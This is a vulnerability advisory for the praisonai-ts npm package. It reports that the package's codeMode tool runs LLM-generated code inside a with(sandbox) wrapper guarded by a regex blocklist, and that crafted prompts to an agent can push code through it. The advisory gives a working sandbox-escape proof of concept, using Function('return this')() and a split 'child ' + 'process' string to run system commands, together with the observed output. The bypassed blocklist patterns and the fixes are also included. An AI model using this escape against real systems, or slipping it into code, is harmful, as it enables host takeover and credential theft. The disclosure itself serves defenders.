PT-2026-53144 · Npm · Praisonai
Publicado
2026-06-18
·
Atualizado
2026-06-18
CVSS v3.1
9.8
Crítica
| Vetor | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
Summary
The
codeMode tool in src/praisonai-ts/src/tools/builtins/code-mode.ts uses new Function() with a with(sandbox) pattern to execute LLM-generated code. The blocklist-based "sandbox" can be trivially bypassed via Function('return this')() to recover the global object, followed by global.require() with string concatenation to evade the blocklist regex. This allows full arbitrary code execution on the host system. This affects all deployments where the code-mode tool is enabled for agents.Details
Vulnerable code (lines 187–191):
typescript
const fn = new Function(
'sandbox',
`with (sandbox) { ${code} }`
);
const result = fn(sandbox);The
code parameter comes from LLM tool call arguments (the execute method at line 104). Before execution, a regex-based blocklist is applied (lines 108–136):typescript
const blockedPatterns = [
/requires*(s*['"]child process['"]s*)/,
/requires*(s*['"]fs['"]s*)/,
/imports+.*froms+['"]child process['"]/,
/process.exit/,
/evals*(/,
];Three fundamental weaknesses:
with(sandbox)does not provide isolation. Thewithstatement in JavaScript adds an object to the scope chain but does NOT prevent accessing the global object. The sandbox object setsprocess: undefinedandrequire: undefined, but these are recovered via the global scope:
javascript
const g = Function('return this')();
g.require('child ' + 'process')-
Blocklist evasion via string concatenation. The regex
/requires*(s*['"]child process['"]s*)/requires the literal string'child process'or"child process"insiderequire(). Usingrequire('child ' + 'process')bypasses this because the regex sees a variable concatenation, not a literal string. -
Function('return this')()is not blocked. None of the blocklist patterns matchFunction(,return this, orglobal.require.
PoC
Setup: Clean checkout at commit
d5f1114a, Node.js v20.20.0 (tested environment).Positive trigger — full RCE with sandbox escape (OBSERVED OUTPUT):
javascript
// This code bypasses ALL blocklist patterns and achieves RCE:
const code = `
const Func = (function(){}).constructor;
const proc = Func('return process')();
console.log('process.version:', proc.version);
const g = Function('return this')();
const mod = 'child ' + 'process';
const cp = g.require(mod);
console.log('RCE:', cp.execSync('id').toString().trim());
`;Observed output (executed in this environment):
OUT: process.version: v20.20.0
OUT: RCE: uid=1000(sondt23) gid=1000(sondt23) groups=1000(sondt23),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin),983(docker),984(ollama)The escape was confirmed by executing the exact code-mode sandbox pattern (
new Function('sandbox', 'with (sandbox) { ... }')) with the blocklist applied first. ALL blocklist patterns were bypassed, and the id command returned the real system user ID.Negative control — blocklist correctly catches direct require:
javascript
const code = `require('child process')`;
// Returns: "Blocked pattern detected: requires*(s*['"]child process['"]s*)"Negative control — blocklist correctly catches eval:
javascript
const code = `eval('process')`;
// Returns: "Blocked pattern detected: evals*("Cleanup: No persistence needed; the code runs in-process.
Impact
An attacker who can influence the
code parameter of the codeMode tool (via crafted prompts to an AI agent using praisonai-ts) achieves full arbitrary code execution on the host system. This includes:- Read/write any file accessible to the process user
- Execute arbitrary system commands via
child process - Exfiltrate environment variables containing API keys, tokens, and credentials
- Install persistent backdoors by writing to startup files
- Move laterally in containerized environments
Suggested remediation
The
with(sandbox) + blocklist pattern is fundamentally insecure and cannot be fixed with regex improvements. Replace it with:- Use
vmmodule with proper context isolation:
typescript
import { createContext, runInContext } from 'vm';
const sandbox = createContext({ /* safe globals only */ });
runInContext(code, sandbox, { timeout: 5000 });-
Or use
isolated-vmfor true process-level isolation with separate V8 isolates. -
Or run code in a subprocess (like the Python
execute code sandboxedpattern already used inpython tools.py) with a clean environment and resource limits. -
If a blocklist approach must be retained, add patterns for:
Function(/new Functionconstructor/proto/prototypereturn this/return globalglobal/globalThis/windowBut note: blocklist approaches are inherently fragile and will continue to have bypasses.
Correção
Code Injection
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Enumeração de Fraquezas
Identificadores relacionados
Produtos afetados
Praisonai